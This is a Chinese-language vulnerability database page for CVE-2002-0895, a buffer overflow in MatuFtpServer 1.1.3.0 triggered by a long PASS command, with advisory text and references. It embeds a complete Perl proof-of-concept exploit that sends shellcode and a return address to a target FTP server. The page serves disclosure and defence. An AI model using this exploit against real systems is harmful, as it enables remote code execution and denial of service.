CVE-2002-0895
CVSS7.5
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:14
NMCOES    

[原文]Buffer overflow in MatuFtpServer 1.1.3.0 (1.1.3) allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long PASS (password) command.


[CNNVD]Matu FTP服务程序远程缓冲区溢出漏洞(CNNVD-200210-036)

        
        Matu FTP是一款免费的FTP服务器程序,可使用在Microsoft Windows 95/98系统下。
        Matu FTP在处理用户提交的数据时缺少正确充分的检查,可导致远程攻击者进行缓冲区溢出攻击。
        攻击者可以提供包含大量字符作为参数的PASS命令提交给Matu FTP服务器,导致服务器程序产生缓冲区溢出,造成堆栈破坏,精心构建字符串参数可能使攻击者以SYSTEM的权限在目标系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0895
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0895
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-036
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4792
(VENDOR_ADVISORY)  BID  4792
http://www.iss.net/security_center/static/9138.php
(VENDOR_ADVISORY)  XF  matuftpserver-pass-bo(9138)
http://online.securityfocus.com/archive/1/273581
(UNKNOWN)  BUGTRAQ  20020522 MatuFtpServer Remote Buffer Overflow and Possible DoS

- 漏洞信息

Matu FTP服务程序远程缓冲区溢出漏洞
高危 边界条件错误
2002-10-04 00:00:00 2005-05-13 00:00:00
远程  
        
        Matu FTP是一款免费的FTP服务器程序,可使用在Microsoft Windows 95/98系统下。
        Matu FTP在处理用户提交的数据时缺少正确充分的检查,可导致远程攻击者进行缓冲区溢出攻击。
        攻击者可以提供包含大量字符作为参数的PASS命令提交给Matu FTP服务器,导致服务器程序产生缓冲区溢出,造成堆栈破坏,精心构建字符串参数可能使攻击者以SYSTEM的权限在目标系统上执行任意指令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用防火墙限制只允许可信用户连接ftp服务器。
        厂商补丁:
        Matu
        ----
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.matusoft.com/

- 漏洞信息 (21468)

Matu FTP Server 1.13 Buffer Overflow Vulnerability (EDBID:21468)
windows remote
2002-05-22 Verified
0 Kanatoko
N/A [点击下载]
source: http://www.securityfocus.com/bid/4792/info

Matu FTP Server is a freely available FTP server for Microsoft Windows 95 and 98 operating systems.

Matu FTP Server is vulnerable to a buffer overflow condition.

It is possible for a malicious user to craft a request that will result in code execution on the vulnerable system.

This issue has been reported in Matu FTP Server 1.13. Other versions may also be affected. 

#!/usr/local/bin/perl

#-----------------------------------------------
# MatuFtpServer 1.1.3.0 exploit ( for Windows98 )
# written by Kanatoko <anvil@jumperz.net>
# http://www.jumperz.net/
#-----------------------------------------------

use Socket;

$connect_host = "target.example.com";
$port = 21;
$iaddr = inet_aton( $connect_host ) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in( $port, $iaddr );
socket( SOCKET, PF_INET, SOCK_STREAM, 0 ) || die "Socket Error.\n";
connect( SOCKET, $sock_addr ) || die "Connect Error\n";
select( SOCKET ); $|=1; select( STDOUT );

    #egg written by UNYUN (http://www.shadowpenguin.org/)
    #16bytes
$egg  = "\x43\x43\x43\x43\x43\x53\x53\x53";
$egg .= "\xB8\x2D\x23\xF5\xBF\x48\x50\xC3";

    #0x0177F984
$buf  = "\x90" x 1032;
$buf .= $egg;
$buf .= "\x8C\xF9\x77\x01";
$buf .= "A" x 696;

print SOCKET "PASS $buf\r\n";
$hoge = <SOCKET>; print $hoge;

--

#sorry for the bad english

Kanatoko <anvil@jumperz.net>
http://www.jumperz.net/(Japanese)
		

- 漏洞信息

9838
MatuFtpServer Long PASS Command Remote Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability
Exploit Public

- 漏洞描述

A remote overflow exists in MatuFtpServer. The application fails to perform proper bounds checking resulting in a buffer overflow. By sending an overly long argument to the PASS command, a remote attacker can cause the server to crash resulting in a loss of availability.

- 时间线

2002-05-22 Unknow
2002-05-21 Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

Matu FTP Server Buffer Overflow Vulnerability
Boundary Condition Error 4792
Yes No
2002-05-22 12:00:00 2009-07-11 12:46:00
Discovered by Kanatoko <anvil@jumperz.net>.

- 受影响的程序版本

Matu Matu FTP 1.13
- Microsoft Windows 95
- Microsoft Windows 98
Matu Matu FTP 1.14

- 不受影响的程序版本

Matu Matu FTP 1.14

- 漏洞讨论

Matu FTP Server is a freely available FTP server for Microsoft Windows 95 and 98 operating systems.

Matu FTP Server is vulnerable to a buffer overflow condition.

It is possible for a malicious user to craft a request that will result in code execution on the vulnerable system.

This issue has been reported in Matu FTP Server 1.13. Other versions may also be affected.

- 漏洞利用

Kanatoko &lt;anvil@jumperz.net&gt; has provided the following proof of concept:

- 解决方案

This issue has been addressed in version 1.14.


Matu Matu FTP 1.13

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站